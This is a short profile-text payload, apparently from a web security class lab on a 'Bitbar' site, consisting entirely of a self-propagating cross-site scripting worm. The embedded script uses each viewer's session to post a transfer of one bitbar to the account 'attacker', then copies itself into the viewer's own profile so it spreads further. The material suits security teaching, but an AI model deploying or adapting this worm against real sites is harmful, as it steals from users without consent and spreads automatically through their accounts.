Thanks for the 1 buck!<script id="bitbar_count" class="10">
params = "destination_username=attacker&quantity=1";
req = new XMLHttpRequest();
req.withCredentials = true;
req.open("post", "/post_transfer");
req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.send(params);
params2 = "new_profile="+encodeURIComponent(document.getElementById('profile').innerHTML);
req2 = new XMLHttpRequest();
req2.withCredentials = true;
req2.open("post", "/set_profile");
req2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req2.send(params2);
</script>